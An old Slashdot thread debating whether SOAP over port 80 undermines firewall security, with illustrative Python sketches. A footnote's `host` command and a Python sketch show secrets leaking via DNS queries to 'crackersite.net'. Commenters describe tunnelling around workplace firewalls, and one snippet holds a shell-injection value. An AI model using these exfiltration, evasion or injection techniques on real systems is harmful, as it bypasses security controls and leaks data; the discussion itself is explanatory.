Web Services - More Secure or Less?
visibleman asks: "I have recently moved onto a project based around web services and SOAP and have, therefore, been doing some reading on those subjects. One thing that keeps coming up is the claim that web services are more secure than CORBA and RMI because they mean drilling fewer holes through firewalls. If I were a firewall administrator (I am not; I am a developer), I would want to know that if I open up a port (port 80, for instance), I know what kind of requests are coming through it. Since SOAP is essentially a mechanism for sending functional requests over a port specified for web page requests, this would make me nervous. My preference would be that requests for web pages go over one port and requests to run services go over another - favouring an IIOP solution. Am I off my trolley, or would other Slashdotters have similar fears?"
The tendency to run everything on port 80 (Score:5, Insightful)
The security or insecurity of a service has nothing to do with whether or not the request can be brokered by a webserver. All this really accomplishes is setting up the webserver as a massive single point of failure, and making it harder to audit what services a particular box is running.
When you use the paradigm that each service has an associated port, you can be sure that nobody is running any unknown services merely by blocking ports. When everything is on port 80, the firewall becomes much less useful.
Re:The tendency to run everything on port 80 (Score:5, Informative)
Although SOAP is bound to HTTP, there is no requirement that you use port 80 -- it's just a well-known HTTP port. As long as the people who need to use your service agree to it, you can use port 12345 if you want. If you are really paranoid, you should be running HTTP over something more secure, like a VPN between you and the service requestor, and not the public (great unwashed) internet.
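For what it's worth, binding HTTP to a non-standard port is a one-liner in most stacks. A minimal sketch in Python (the port number and reply text are invented for illustration; this is a bare HTTP listener, not a SOAP endpoint):

```python
import http.server
import threading
import urllib.request

PORT = 12345  # illustrative; any port both parties agree on works

class EchoHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"hello from a non-standard HTTP port"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

# Bind first, then serve exactly one request on a background thread
httpd = http.server.HTTPServer(("127.0.0.1", PORT), EchoHandler)
t = threading.Thread(target=httpd.handle_request)
t.start()
with urllib.request.urlopen(f"http://127.0.0.1:{PORT}/") as resp:
    reply = resp.read()
t.join()
httpd.server_close()
```

The point being: nothing about HTTP (or SOAP-over-HTTP) cares which port it rides on; port 80 is a convention, not a requirement.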
Re:The tendency to run everything on port 80 (Score:4, Informative)
Re:The tendency to run everything on port 80 (Score:2, Interesting)
SOAP makes me happy. If we all just shut up and be proper and diligent, we just *might* be able to put these platform wars behind us. Of course, some among us will do everything short of homicide to fuck it up, because they have a vested interest in keeping us fighting each other, but maybe some people will get it.
Re:The tendency to run everything on port 80 (Score:2)
Re:The tendency to run everything on port 80 (Score:2)
Re:The tendency to run everything on port 80 (Score:2)
But port 12345 is already being used [sans.org].
Re:The tendency to run everything on port 80 (Score:2)
The *reason* for the tendency (Score:2)
You don't have to answer difficult questions about how your service is secured, how it might be exploited to reach other resources within the firewall, etc. You ride the coattails of the "harmless" web server traffic.
Re:The *reason* for the tendency (Score:5, Insightful)
The problem with big companies who give us big bucks to develop web apps is that the firewall/security teams are totally unresponsive to requests from development teams. A lot of firewall teams act as if nothing is ever up for discussion, and 80 and 443 are all that will ever be. System security would be a lot stronger if the security teams worked along with development teams, but instead a ton of security teams have a fortress mentality, for both system security and their own interactions - locking themselves away from contact. As a result, everything and anything will eventually be pushed through 80 and 443.
ostiguy
Re:The *reason* for the tendency (Score:2, Insightful)
If you are developing an application that Company X needs to use and it has to communicate through the firewall, a simple phone call to PA's manager would solve the problem. But the real reason you want to run SOAP on port 80 is because you don't have a legitimate reason for your application to be running inside the corporate firewall. By legitimate, I mean in the minds of management. No, a "harmless" "e-commerce" "web-app" for music/pr0n/gambling/shopping/whatever is not likely to be considered a legitimate reason.
Any admin would much rather have a program using port 12345, because then, if there is an exploit or a malevolent user, it can be blocked at the packet level. The alternative is reassembling every response and parsing the entire message, using an infinite symbol list and AI that can detect the potential threat in any file sent through the only port on the only address on the only host in the network - if you can call it that anymore.
Re:The *reason* for the tendency (Score:3, Insightful)
SOAP is being pushed as an alternative to EDI, Corba, etc, etc (this isn't my area, remember, I am the netadmin trying to destroy tcp/ip). This is because firewall/security teams are not interested in working with (their company's) vendors to establish IPSec tunnels, or SSL tunnels for various apps. Instead of quicker binary transfer within an SSL or IPSec tunnel, stuff will be kludged into HTTPS, lest the firewall team's sensibilities be offended.
There will be a huge market for near-wirespeed (as near as one can get) HTTP proxies soon as a result. Pretty soon someone will build some hack with some beta of
ostiguy
Re:The *reason* for the tendency (Score:2, Insightful)
Same goes for third-party web-based applications and services. It is VERY difficult to convince an IT group to open new ports - even if they are for established, standardized protocols.
Running on ports other than 80 is frequently a deal-breaker when trying to sell network applications into highly security-conscious environments. Most network admins equate more open ports with less security, whether that is justified or not. HTTP is something they know and understand and have already set their network up to support - SOAP just makes sense.
Re:The *reason* for the tendency (Score:2, Insightful)
It has more to do with the people-ware than the software. Security people win if absolutely nothing happens. Greater traffic == greater tendency for things to go awry. Management, if it can be awakened, needs to step in and restore balance between security and operational concerns.
Re:The *reason* for the tendency (Score:3, Funny)
oooooooooooooooooooooooooooooo
o __________Notice _________ o
o If you are a cracker or o
o terrorist please use      o
o port 80 as it is secure.  o
o Otherwise you may use the o
o non-secure port 2000. o
o Thanks and have a nice day o
oooooooooooooooooooooooooooooo
Re:The *reason* for the tendency (Score:3, Funny)
Re:The tendency to run everything on port 80 (Score:4, Insightful)
Ah ha! Pronoun trouble!
Unfortunately, you can only be sure that nobody is running any unknown services if they use the paradigm that each service has an associated port. Some fool rigs up a VPN layered over HTTPS or DNS, and what good is your firewall then?
In some ways, SOAP's obvious security problem is better; at least it's clear you're screwed.
Solving this correctly is a very hard problem.
Re:The tendency to run everything on port 80 (Score:5, Informative)
Here's a purposely oversimplified and perhaps harsh explanation:
Simplistic firewall administrators don't care what you send over the network, as long as it's on port 80. More sophisticated administrators also insist that it's HTTP. Even more sophisticated ones inspect in more detail, such as checking to see if transferred files have viruses in them.
It's only a matter of time before firewall administrators notice that SOAP requests are really RPC calls and block them by default - then we will all be back to having to get specific configuration changes made to let apps work through the firewall. We won't want to do that, for the same reasons we don't want to try to convince someone that it's OK to open a port.
I predict that there will therefore be a way developed to wrap SOAP not only in HTTP, but in HTML. The XML SOAP request could sit inside of simple HTML wrapper tags; this would let it go through the likely block-by-default of SOAP traffic.
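The predicted wrapping could be as crude as this sketch: bury the SOAP envelope inside an HTML comment so a naive filter sees only a web page. Everything here (function names, the `SOAP:` marker, the sample envelope) is invented for illustration, and it assumes the payload itself never contains `-->`:

```python
import re

def wrap_in_html(soap_xml: str) -> str:
    # Hide the envelope inside an HTML comment in an innocent-looking page
    return (
        "<html><body><p>nothing to see here</p>"
        f"<!--SOAP:{soap_xml}-->"
        "</body></html>"
    )

def unwrap_from_html(html: str) -> str:
    # The receiving end digs the envelope back out of the comment
    m = re.search(r"<!--SOAP:(.*?)-->", html, re.DOTALL)
    if m is None:
        raise ValueError("no embedded SOAP payload")
    return m.group(1)

envelope = "<Envelope><Body><getQuote>IBM</getQuote></Body></Envelope>"
page = wrap_in_html(envelope)
recovered = unwrap_from_html(page)
```

Which is exactly why inspecting "is it HTTP?" or even "is it HTML?" buys a firewall so little.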
Re:The tendency to run everything on port 80 (Score:2)
It's not about security; it's about the administrative effort of getting a firewall configuration change made in a large organization.
You mean it's all about avoiding security. Security policies are getting in your way, so you're finding a way to quietly violate their spirit while conforming to their letter. That's a great way to completely compromise the security of your company's IT infrastructure. Good job.
Re:The tendency to run everything on port 80 (Score:2)
you're finding a way to quietly violate their spirit while conforming to their letter. That's a great way to completely compromise the security of your company's IT infrastructure. Good job.
I'm just saving my boss the trouble of doing it himself.
Re:He's NOT trolling (Score:2)
agreed: he is *SO* *NOT* trolling (my experiences) (Score:2, Insightful)
It's hardly surprising: they've all been sold on the idea that all they need is a firewall. Then, when they discover they need a policy for that firewall and for handling requests from their staff, they all choose to do "whatever everyone else does". This means HTTP, SMTP and POP, basically. (I'll refrain from commenting on how "secure" those three are.)
I was once told (at a previous job) I couldn't have CDDB because it was MP3-ish and might be used by music pirates. (In case you don't know, it's a service for looking up the titles of songs, not getting the music itself. I explained this to the guy. He said "I know", but it still wasn't happening.)
Actually the other thing that goes on is people outsource their firewall management. Every time you call you wait a week to get the person who knows their account, then they charge $$$ per hour to make a change. I think we found the real cause of my "no-CDDB" problem.
Re:agreed: he is *SO* *NOT* trolling (my experiences) (Score:2)
Implementing IP over SOAP (Score:5, Funny)
So true.
It's taken many years to build up the many layers of network security we have. One of the main reasons SOAP is so easy to use is that it drills a hole right through all those layers. In other words, SOAP is easy because it encourages you to ignore everything that makes remote applications hard -- like security.
As an example of just how wacky the everything-on-port-80 idea is, and how dangerous, consider this idea I heard from Bruce Schneier: implement IP over SOAP: have a SOAP service listening at two endpoints for IP packets, and forward those packets over SOAP to the other endpoint. Then make one of those endpoints the default gateway for packets into the otherwise-secure network at the other end....
Just ponder that.
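The reason the IP-over-SOAP idea works at all is that any byte blob, a raw IP packet included, fits trivially inside a SOAP-ish envelope. A toy round-trip sketch (no real SOAP library or network I/O; the element names and the dummy packet are invented):

```python
import base64
import xml.etree.ElementTree as ET

def packet_to_envelope(packet: bytes) -> str:
    # Wrap an opaque packet in a SOAP-style XML envelope, base64-encoded
    env = ET.Element("Envelope")
    body = ET.SubElement(env, "Body")
    ET.SubElement(body, "ForwardPacket").text = base64.b64encode(packet).decode()
    return ET.tostring(env, encoding="unicode")

def envelope_to_packet(envelope: str) -> bytes:
    # The far endpoint recovers the raw packet and would inject it locally
    root = ET.fromstring(envelope)
    return base64.b64decode(root.find("./Body/ForwardPacket").text)

fake_ip_packet = b"\x45\x00\x00\x1c" + b"\x00" * 24  # 28-byte dummy "header"
env = packet_to_envelope(fake_ip_packet)
recovered = envelope_to_packet(env)
```

Point one of these "services" at a default gateway and the firewall's port policy is decoration.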
Re:Implementing IP over SOAP (Score:2)
gnu httptunnel vs. Mindterm (Re:SSH over HTTP) (Score:2, Informative)
Better yet, unlike Mindbright's applet, httptunnel is free software (GPL). Mindbright's applet does sound like it has some nice bells and whistles, though. Probably worth paying for if you were going to roll SSH over HTTP out as a solution for a larger group of users. (Using ssh over httptunnel works great, but it can be a little confusing to set up the first time.) Otherwise, try httptunnel instead.
BlueCollarTech.com [bluecollartech.com]
You can tunnel anything inside of anything. (Score:3, Informative)
Re:Implementing IP over SOAP (Score:3, Informative)
And you are most likely going to find SOAP engines that perform a lot more error checking and parsing of an XML message before handing it to you than your average cgi-bin script that gets the POST request does.
OF COURSE it's more secure!!! ;) (Score:3, Insightful)
Seriously-- allowing ANY sort of RPC through a firewall has some serious risks.
Re:OF COURSE it's more secure!!! ;) (Score:3, Insightful)
"If you do this you'll get in trouble!" (Score:2, Interesting)
Which was blocked by the company firewall.
So I go ask the admin why it's blocked. I mean, WTF, blocking random _incoming_ ports I can understand, but outgoing ports? When there's already port 80 and 21 wide open? Not to mention DNS[1].
"We don't open it because it's more secure that way", he said. "But it's not more secure!" "YES it is!" "Why?" ".... BECAUSE!"
"Ok, but look, I could just make an SSH tunnel on port 80 with pppd and bypass all that stuff."
He replied: "well if you do that, you'll get in a LOT of trouble, and the company is going to sue you! And I warn you because I have logs of everything!"
Now what's really interesting is that I had been running this particular setup (pppd through ssh on port 80) for a couple months already, and nobody noticed.
[1] You think you've secured everything and that no info can get through your highly secure firewall? But have you thought about the DNS?
$ host the.root.password.is.iluvmom.crackersite.net
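Footnote [1]'s trick generalizes: arbitrary data can ride out of a "secured" network as DNS query labels. A sketch of one such encoding (the scheme, domain, and function names are invented, and no actual DNS queries are sent):

```python
import binascii

def encode_as_hostname(secret: bytes, domain: str = "crackersite.net") -> str:
    # Hex-encode the secret and split it into DNS labels (max 63 chars each)
    hexed = binascii.hexlify(secret).decode()
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    return ".".join(labels + [domain])

def decode_hostname(hostname: str, domain: str = "crackersite.net") -> bytes:
    # The attacker's nameserver sees the query and reassembles the secret
    hexed = "".join(hostname[: -len(domain) - 1].split("."))
    return binascii.unhexlify(hexed)

name = encode_as_hostname(b"the root password is iluvmom")
leaked = decode_hostname(name)
```

A single `host`/`gethostbyname` call on such a name hands the data to whoever runs the authoritative server, straight through the firewall's permitted DNS.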
Re:The tendency to run everything on port 80 (Score:2)
Re:The tendency to run everything on port 80 (Score:2)
The same principle, in reverse, is why Phil Zimmermann (and others) advocates email encryption. The more common encryption is, the less strong the protocol needs to be to achieve relative security. It takes more work to filter through a million 46-bit ciphertexts than one 128-bit ciphertext. Technically this isn't true, but practically it is.
It is easier to spot a smoking gun if there are only two people in the room than if you are in a stadium full of people.
From a security standpoint (Score:5, Insightful)
I don't think it matters which you use. Allowing people to make functional requests to programs inside your firewall is just as much of a security risk either way. I actually think [omnifarious.org] the function call model is an evil, misleading, broken way of thinking about messages over networks, but like several other practices, people seem bound and determined that this is the way to do things. If you must do this evil thing, it probably doesn't matter (from a security standpoint) how you do it.
The only thing you really gain by not going through port 80 is that the attacker theoretically won't be able to break into your web server software by breaking into your RPC software, but I wouldn't count on that being the case. Besides, either way they've gotten onto your box; does it really matter how?
Holes in firewalls aren't intrinsically bad things. It's what they lead to that's the problem.
Re:From a security standpoint (Score:3, Interesting)
That is hardly reason for calling it evil.
To call it misleading, you would need to provide an argument for why the function call paradigm makes sense when both program components are on the local machine but not when they are distributed. Why should that make a difference? Why should I care where the other end of my transaction is located?
It seems your arguments have more to do with current implementations than any morality inherent in the function call paradigm. I notice that your own alternative is written in C++, which uses the function call paradigm rather than the obviously more efficient, correct, and aesthetically pleasing message passing paradigm.
Re:From a security standpoint (Score:3, Interesting)
I also complain a lot about latency, and I should complain about the lack of a shared address space, which leads to even more latency. That's the biggest issue. The function call model encourages you to ignore unavoidable latency in network messages. It's a fine model for things within the same process, but latency makes it misleading and evil for network messages.
Because, when it's located far away, you have several issues to contend with. First, a function call normally has a latency in the nanosecond range. A network message over the Internet normally has a latency in the millisecond range. Even LAN messages have latencies in the hundreds-of-microseconds range. That's at least 4-5 orders of magnitude (base 10) difference. That's gigantically huge. Yet it sits there in your program looking like an innocent function call that you'd normally expect to exact an overhead of a few nanoseconds.
The other problem is that you don't have very much control over the state of the other program, especially if someone else wrote it. You're essentially introducing close state dependencies between programs that are largely unrelated, and several milliseconds apart. There is nothing _inherent_ about the function call model that forces you to introduce these dependencies, but everything that everybody knows about programming causes you to make certain assumptions about function calls that just aren't true for network messages, especially between largely unrelated programs.
RPC is evil because it hides those essential differences from you.
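The magnitude gap the parent describes is easy to see in a few lines. This sketch fakes the network with a 5 ms sleep standing in for a typical Internet round trip (an assumption, not a measurement); both calls look identical at the call site, which is exactly the complaint:

```python
import time

def local_add(a, b):
    # An ordinary in-process call: overhead in the nanosecond range
    return a + b

def remote_add(a, b, simulated_rtt=0.005):
    # Same signature, but the stub quietly pays the wire time
    time.sleep(simulated_rtt)  # stand-in for network latency
    return a + b

t0 = time.perf_counter()
local_add(1, 2)
local_elapsed = time.perf_counter() - t0

t0 = time.perf_counter()
remote_add(1, 2)
remote_elapsed = time.perf_counter() - t0

# The two call sites are indistinguishable; the costs differ by orders of magnitude
assert remote_elapsed > local_elapsed * 10
```

Nothing in the syntax warns you which call costs four to five orders of magnitude more; that is the hiding the parent is objecting to.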
Re:From a security standpoint (Score:2, Informative)
If I move my program from a flash device to an old MFM drive the drive latency would increase substantially but I don't think that would be reason for calling all synchronous disk I/O broken, evil, and misleading.
Re:From a security standpoint (Score:3, Insightful)
"The other problem is that you don't have very much control over the state of the other program, especially if someone else wrote it."
And with SOAP and XML, you have total control over the remote program? Having "loosely coupled" "general" SOAP messages won't solve incorrect implementations of the remote service.
Re:From a security standpoint (Score:2)
I don't like SOAP either. When I talked about XML in my 'paper', I meant XML documents that aren't designed to encapsulate a function call, but merely carry information.
Re:From a security standpoint (Score:2)
XML documents that aren't designed to encapsulate a function call, but merely carry information.
in SOAP, XML is used to encapsulate function call ids and arguments - it's just data
Re:From a security standpoint (Score:3, Insightful)
Does a call that results in a bunch of SOAP formatted XML being put on the wire look like a function call or not? Does that function call have arguments that mirror the data stuck on the wire or not? If the answer is yes, then SOAP is designed to encapsulate a function call, and is evil.
Re:From a security standpoint (Score:2)
Re:From a security standpoint (Score:2, Interesting)
On the other hand, however, those who use SOAP calls correctly will reap the benefits SOAP has to offer.
An example:
I work for a mortgage company. We had an online rate search engine (till the market went sour anyway). One of our clients ran a few XML queries to our engine (they were located in California, we are in Chicago). Here are the two most important queries.
1. The Loan Search: they would ask a few questions, and then do a Loan Search with one XML query and cache the results.
2. Apply for a loan: they would acquire all information related to applying for a loan, and then send one XML query at the end containing all that information.
Had SOAP and WebServices been available at the time to use in place of custom built XML handling methods (not to even mention production ready XML libraries) our jobs would have been a lot easier.
Had we used SOAP to handle every request (including sending every individual piece of information separately, or sending an XML document back and forth for every step of the loan application process), our application would have been a hideous failure. Instead, it worked just fine. The biggest problems were that my XML parsing techniques were lackluster (this was the first work with XML I had done, so it was a little slow) and that the market just wasn't there for online mortgaging (to this day, only about half a percent of people who get mortgages actually buy their mortgages entirely online).
SOAP has its uses, but like any good technology, people can abuse it. As always, time will separate the good programmers from the bad programmers. Therefore, my conclusion is that SOAP is not inherently evil; rather, a lot of crappy programmers are!
Bryan
Re:From a security standpoint (Score:2)
You can't make blanket statements like that. Say I am writing an e-commerce app that interfaces with a FedEx web service to get prices for shipping to various destinations, for certain services, at a certain weight, and I make a call every time a customer wants to know how much shipping would cost. I can get that aspect of the system up and running in less than half the time it would take to develop the in-house data structures, load them, and continue to load them daily (or maybe several times a day, depending on how often the data changes). If time-to-market is a high priority (and it should be), then frequent small calls to internet web services could be the answer to a lot of problems.
Re:From a security standpoint (Score:2)
How fortunate that I don't know anyone who does.
Just because there's a performance difference between RPC and LPC doesn't mean that we HAVE to have a different interface for the two. In fact, it's downright stupid to deny yourself the simplicity of function-like RPC calling when it's what the situation calls for.
If a program in question has other needs, then do something else.
You are making a mountain out of a molehill. Show me a program that has the problems you are so worried about. I don't see one. I see programmers using RPC and other methods correctly for the situation.
For a change.
Re:From a security standpoint (Score:2)
I don't know of any programs outside of a proprietary environment that do that. I know of some older research grade programs that do that. I haven't investigated GNOME carefully.
I think that the simplicity is as false as the simplicity of starting up a new thread for every connection when you have to talk to 5000 people at once.
Re:From a security standpoint (Score:2)
You seem to want programs to prevent you from using them wrongly. Can't happen. Mathematically provable, for sufficiently precise definitions of "wrong". If you insist on living in that world, expect to pay the usual price for a disconnection from reality, whereas the rest of us will continue to have tools that allow us to do dumb things like open 15000 GUI windows. But somehow, we manage to avoid it, without people like you holding our hands.
Except on porn sites & typo sites.
Re:From a security standpoint (Score:2)
Umm, I've seen plenty of programs that have a threading model just as I described. If you listened to people 2-3 years ago, that idea was all the rage.
I don't want things that prevent you from doing stupid stuff. I just want things that don't encourage you to.
Re:RPC evil (latency & failure potential) (Score:2)
while ((response = network_event_handler(request)) == NULL)
{
    wait();
    if (timeout())
    {
        exception("Time to find out who's running Gnutella");
    }
}
Re:From a security standpoint (Score:2)
Re:From a security standpoint (Score:2)
SSL isn't an RPC protocol. It's fine to use to hide your data. :-)
Re:From a security standpoint (Score:2)
Oops, I didn't answer your question before. You don't WANT to use SSL because it's expensive.
Well, SSL/TLS, or something like it, is the only solution that's really any better than plaintext XML. If you think something more obscure is better, you're just fooling yourself. Though you can use something other than HTTPS (which assumes you will be making HTTP requests over SSL/TLS), you might want to design your own protocol and encapsulate it in SSL/TLS instead.
The advantage of doing your own protocol would be that you could have different session setup and teardown semantics than HTTP. HTTP tends to assume that you'll fetch a web page (or a few pages in HTTP/1.1) and then disconnect. You might want to avoid the setup and teardown overhead, because that's the most expensive part of an SSL/TLS session, so designing your own protocol that kept the connection around longer might be an idea.
Overestimating Firewalls. (Score:5, Insightful)
Re:Overestimating Firewalls. (Score:2)
"Harmless http?" (Score:2)
Hmmm.... Not only can XML-RPC and SOAP also run on port 80, but that HTTP traffic can be mighty harmful... Think of Nimda, Code Red, and CRII.... The problem is that any "protocol" is fundamentally used to exchange instructions, and these instructions can be used for all sorts of stuff.... So filter based on services, but please keep the services in your DMZ.
Basically, this means--
filter based on IP address and port number. Only allow those things to pass through the firewall that you absolutely need (with the possible exception of outgoing TCP connections, at your discretion), and keep it all inventoried.
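The default-deny policy described above reduces to a tiny decision function: permit only an inventoried set of (address, port) pairs and drop everything else. A sketch (the inventory below is made up, using documentation addresses):

```python
# Hypothetical inventory: web server on 80/443, mail relay on 25
ALLOWED = {
    ("192.0.2.10", 80),
    ("192.0.2.10", 443),
    ("192.0.2.25", 25),
}

def permit(dst_addr: str, dst_port: int) -> bool:
    # Anything not explicitly inventoried is denied
    return (dst_addr, dst_port) in ALLOWED

ok = permit("192.0.2.10", 443)       # inventoried -> pass
blocked = permit("192.0.2.10", 12345)  # not inventoried -> drop
```

The whole thread's tension is visible here: once every service hides behind `("192.0.2.10", 80)`, this cheap check stops meaning anything.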
Re:Overestimating Firewalls. (Score:2, Informative)
Errr.. no. Every competent network administrator distrusts the inside as much as the outside (except for the DMZ).
Re:Overestimating Firewalls. (Score:2)
This is even more true if the institution to be "protected" is a school. It's as necessary to protect the world outside from your own evil students as it is to protect your network from the world outside...
Re:Overestimating Firewalls. (Score:2)
So I just use citrix to connect to my house via port 443. I can use all the apps (icq, etc) on my home machine no problem.
Re:Overestimating Firewalls. (Score:2)
Exactly. And if the bank you work at allows https traffic, it's even more fun: as https is normally encrypted, the firewall cannot even make sure that the traffic passing over port 443 is indeed https. When I worked at a bank, I had telnet servers running on port 443 of a couple of machines outside, and could happily log in to them from work...
SSL (Score:2)
The only way to stop it is to block SSL / HTTPS. Ah, that's a fantastic way to increase security
Firewalling & administration (Score:3, Insightful)
Forcing requests to utilize web services is an easier security model. Only a single port needs monitoring, and DDoS, proper request structure, overflows and the like are handled by the web server, thus abstracted from your application layer and upgradable with less effect on your development. Also, it's assumed you are using a professional-level web server (Apache, iPlanet, NES, or even IIS), meaning a greater user base, resulting in problems getting found quicker and fixed faster.
Separate Ports for Separate Functions (Score:5, Insightful)
Separate but equal is what I say.
My problem is usually the range of ports... (Score:2)
I've worked with stuff that required a range of ports (like thousands of them), which is what makes your IP people freak. Far more common than one would think.
SOAP (Score:5, Interesting)
SOAP is transport independent. That's one of its (theoretical) virtues. You can implement SOAP over SMTP, HTTP, whatever.
Practically, it does seem fair to say that HTTP is what an awful lot of SOAP tools are going to be expecting, and given that SOAP is still quite bleeding edge, I wouldn't want to try using another transport protocol unless I could afford time and skill to do a lot of fixing up.
However, HTTP doesn't have to run on port 80. Furthermore, most SOAP implementations will be (well, claim to be) happy on HTTPS too, so that's an easy way to do encryption.
As for the 'web page vs functional' thing, well that's not so simple. A request for a page produced by a CGI script is a functional request coming from strangers over the web. SOAP need not be different.
At the moment, if I want to make an XML version of my content available to folks, I might tell them to use HTTP GET with a URL that invokes a CGI program that returns some XML.
In the future, I might want to make the same XML available via the getXML method of my Website class, and then SOAP-enable my Website class.
The difference isn't that great.
Re:SOAP (Score:2)
Why? Ask anyone who writes tools that piggyback off of eBay whether they wish eBay supplied an XML representation of auction data. They will pee themselves, then scream out loud with joy. XML provides a way to exchange data that is human and machine readable. It also responds well to compression, due to redundancy.
SOAP security (Score:2, Interesting)
Possibly the most secure precaution is using SSL for the requests. You can require a client certificate to access the service and your site certificate will reassure your partners that they have connected to the correct server. In addition, you can build in custom username/password fields into the app, or have each message PGP signed.
Another option is to move your application to a different IP address and use the firewall to restrict access to it. This method is good if your partners are known ahead of time.
Hope this helps.
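The client-certificate option above amounts to one setting on the server's TLS context: refuse any connection that doesn't present a cert signed by a CA you trust. A Python sketch (the `.pem` file names are placeholders, so the load calls are shown commented out; no connection is made here):

```python
import ssl

# Server-side TLS context that demands a client certificate
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.verify_mode = ssl.CERT_REQUIRED  # handshake fails without a valid client cert

# In a real deployment you would also load key material (placeholder paths):
# ctx.load_cert_chain("server.pem")             # the site cert partners verify
# ctx.load_verify_locations("clients-ca.pem")   # CA that issued partner certs
```

With `CERT_REQUIRED` set, unknown callers are rejected during the handshake, before a single byte of SOAP reaches the application.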
Why do you care? (Score:2)
We've all seen that access to port 80 can cause problems with incorrectly configured IIS machines anyway.
Basically, as a person responsible for security and firewall configuration, you don't enable access on a port just because someone asks for it - you check out what it is going to be used for, make a decision, AND give warnings to those involved.
In theory ... (Score:5, Informative)
You can use any port you choose. A bit "security through obscurity", this one, but no harm there.
You don't really need a full web server. All you're going to get is an HTTP request with a SOAP envelope thingy inside. If it doesn't match the WSDL (or whatever) schema thingy you've published, then just ignore it. You only need give the information to people who are going to be legitimately calling your service. Of course you're still vulnerable to normal DoS, but then isn't everyone.
It is quite possible to digitally sign SOAP requests. Just ignore anything not signed/not signed by a recognized customer.
If you are only expecting SOAP requests from a few other servers, then consider client-side SSL. Since only a few servers will be calling you, you'll only need a few client certs.
... well ... you get what you ask for. Signatures on SOAP requests aren't (easily) supported by everything yet - but then SOAP implementations differ (eg MS SOAP has no types, IBM SOAP does). This isn't a major issue as it's pretty easy to roll your own request - it's only XML after all.
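Rolling your own request signature, as suggested above, can be as simple as an HMAC over the envelope with a pre-shared key (sketched here rather than full XML-Signature; the key and envelope text are invented):

```python
import hashlib
import hmac

SHARED_KEY = b"pre-agreed-with-partner"  # placeholder secret, exchanged out of band

def sign(envelope: str) -> str:
    # Keyed hash over the exact envelope bytes
    return hmac.new(SHARED_KEY, envelope.encode(), hashlib.sha256).hexdigest()

def verify(envelope: str, signature: str) -> bool:
    # Constant-time comparison; reject anything unsigned or tampered with
    return hmac.compare_digest(sign(envelope), signature)

env = "<Envelope><Body><getQuote>IBM</getQuote></Body></Envelope>"
sig = sign(env)
valid = verify(env, sig)
tampered = verify(env + " ", sig)  # even one extra byte invalidates it
```

Requests that fail `verify` get ignored, exactly as the comment recommends; it's only XML after all, so attaching the signature as an extra header element is straightforward.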
Like everything, it's as secure as you make it. If you expose "FuckMyOS" as a SOAP method and publish it through UDDI or something then
PS I have no opinion on Vladinator's website.
Re:In theory ... (Score:2)
CGI programmers have had to be trained to code safely, not doing stuff like:
system "$unchecked_input";
SOAP programmers have to be trained similarly. Give 'em some rope, but make sure they don't hang you with it!
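The Python analogue of that unsafe call, and the trained-safe version, looks like this: never interpolate raw input into a shell string; pass an argument vector instead (the hostile filename is invented for illustration):

```python
import subprocess

unchecked_input = "report.txt; rm -rf /"  # hostile input smuggled into a "filename"

# Unsafe: the shell would parse the string, and '; rm -rf /' would execute:
#   subprocess.run("cat " + unchecked_input, shell=True)

# Safe: the whole string is passed as one literal argument to cat,
# so the embedded command is never interpreted by any shell
result = subprocess.run(["cat", unchecked_input], capture_output=True, text=True)
# cat simply fails to find a file with that odd name; nothing is deleted
```

The same discipline applies to a SOAP handler: treat every field of the envelope as data, never as something to hand to a shell or an eval.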
better to separate your ports (Score:3, Insightful)
I could, for instance, run my setup on a single box; and then, when traffic went up and the service got popular, replace the box with a Linux firewall to an intranet. The functions could then be divided among several machines on that intranet, and having the firewall box route different ports to their dedicated machines would be a trivial task.
Hell, you could even have redundant machines for critical operations, and if a failure occurred you need only change the routing on the firewall box to get things back up.
More Security Means Knowing What is Going On (Score:2, Informative)
However, there is a flip side to this. I have been in the position of trying to convince large companies to change their firewall configurations. It would be easier to turn lead into gold than to get a large company to allow communications through a new port on their firewall.
This basically means that putting everything through port 80 serves two purposes. It gives people the perception of security, and it lets the project actually happen. It is the case that not having to change your network configuration is a powerful marketing tool, but it doesn't make anything more secure. All of these issues are addressed in just about every networking book out there.
Isn't this just an idea for a portal? (Score:3, Interesting)
Also by doing portals in this way, you can force users to authenticate an HTTPS session before accessing the portal site, and the services behind the portal. Of course, how you do authentication can be anything from login/pass to securid or X.509 certificates. Once the users authenticate themselves, then accessing the applications "through port 80" is more secure.
However, setting up multiple DMZs is the way to go. In my example above, where the webserver accesses the services behind the portal, you'd set up those applications in their own DMZ (separate from the webserver DMZ). Access to this DMZ wouldn't be allowed directly from the outside (restricted by FW), which again would require a compromise of the web server. The other advantage is that if an attacker were to compromise the application *somehow* without a webserver compromise, they would be restricted to the boxes in this second DMZ and would not compromise the webserver as well. Setting up a DMZ correctly means a lot. You can set up a DMZ to accept incoming connections but not to allow anything outbound (except for established, stateful traffic). This would prevent an attacker who has compromised services in the DMZ from attacking anything else from that point into the rest of your network.
Re:Isn't this just an idea for a portal? (Score:2)
That's all very well, but the inspection performed by the FW-1 HTTP Security Server is quite expensive in performance terms (effectively it turns FW-1 from a stateful packet filter into a proxy).
Not only that, but historically, there have been plenty of problems with the Security Servers to the extent that I wouldn't be happy deploying it on a production, high traffic network (and certainly not without extensive validation).
To be fair, I haven't worked with FW-1 recently and haven't looked at NG (aka v5) at all, so things may well have gotten better.
--
Re:Isn't this just an idea for a portal? (Score:2)
And you're right, the HTTP security service is resource intensive, but that's why you get a few boxes in a sandwich and the load is lessened.
It all has to do with costs on whether you want to implement such a solution.
Valid question. (Score:2)
Now, this does NOT mean that web services are bad, simply that web services have to be written with the understanding that they ARE more open than normal simple RPC calls. Greater use of this design means greater risk in general, since access to functions that may be susceptible to buffer overflows, denial-of-service attacks, etc., is now basically sitting out there in the open. I've never heard of a denial-of-service attack targeted at an RPC mechanism, but with little or NO modification, this type of attack could be deployed 'out of the box'.
New security measures will have to be created in order to thwart this greater risk that will now be exposed.
Building analogy (Score:3, Insightful)
Let's say you have a security system hooked up to the front door, the windows, loading dock doors etc. Normally pretty much anyone is allowed to walk through the front door. You do hope nobody manages to climb in through a window, and you have strictly controlled access via the loading dock.
Now if your reception is poorly designed your only hope is that nobody who walks through the front door hacks off the head of your receptionist and proceeds to go walkabout through the building screwing with things. If your reception is well designed this will be hard to do.
